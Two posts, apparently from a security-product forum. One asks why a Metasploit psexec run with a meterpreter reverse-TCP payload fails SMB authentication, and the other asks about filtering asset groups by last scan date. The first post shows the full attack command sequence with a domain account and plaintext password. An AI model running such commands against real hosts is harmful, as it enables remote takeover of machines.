


psexec exploit in metasploit

Hi All,

Please see the error message when running exploit. It does not seem to get past authentication.

    msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
    msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    msf exploit(windows/smb/psexec) > set RHOST
    RHOST =>
    msf exploit(windows/smb/psexec) > set LHOST
    LHOST =>
    msf exploit(windows/smb/psexec) > set SMBDomain CORP
    SMBDomain => CORP
    msf exploit(windows/smb/psexec) > set SMBUser "localadmin"
    SMBUser => localadmin
    msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd"
    SMBPass => MrPassw0rd
    msf exploit(windows/smb/psexec) > set LPORT 4444
    LPORT => 443
    msf exploit(windows/smb/psexec) > exploit
    [*] Started reverse TCP handler on
    [*] - Connecting to the server...
    [*] - Authenticating to| as user 'CORP\localadmin'...
    [-] - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host.
    [*] Exploit completed, but no session was created.
    msf exploit(windows/smb/psexec) > version
    Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b
    Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b

I tested authentication by running the Sysinternals PsExec outside of Metasploit. PsExec was successful.

    C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\ -u CORP\localadmin cmd
    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals -
    Password:
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.
    C:\Windows\system32>whoami
    CORP\localadmin

Same result by using exploit psexec_psh. Please give advice. Thanks.

Regards,
AA

Posted by aa about a year ago


AD connection, "Last scan date" in DAG and no devices returned

Hi, got an issue with a DAG outcome.

I have a site_A populated by AD connection with devices. Works well - it populates the site_A with names and OS, but not with IP addresses of the devices. Understood, need to do discovery to get IPs. I have no scans scheduled for site_A as it only serves as the AD connection population target.

Then I have a DAG which filters the devices from site_A based on this filter:

    Site name - is - "site_A"
    Last scan date - earlier than - 1 day (1 day is for testing only, in production I will have 30 or so)

The problem is that if site_A has just been populated with fresh new devices from AD connection, the DAG won't return any devices regardless of the "last scan date" filter condition setting - I've tried both complementary options: (Last scan date - earlier than - 1 day) and (Last scan date - within the last - 1 day). The DAG just doesn't show any devices from site_A. When I delete the second condition with "last scan date" and keep only the "site name..." condition, the DAG correctly returns all the devices in site_A. I have also waited one, two and three days to check if days play any role in the DAG generating - but they obviously don't, as I have been getting the same results each day.

Am I doing anything wrong? Can anyone help?

My aim is to scan the devices from site_A in small portions every day - so I thought I would manually run a scan for a small portion of devices each day until all of them are scanned and then let a site based on the DAG be scanned every day on schedule. With the condition "Last scan date - earlier than - 30 days ago" in the DAG, the daily scans will do only a small portion of devices which have not been scanned within the last 30 days, forever. Any better idea how to achieve that is also welcome. Thanks.

Posted by Jiri Dohnal about a year ago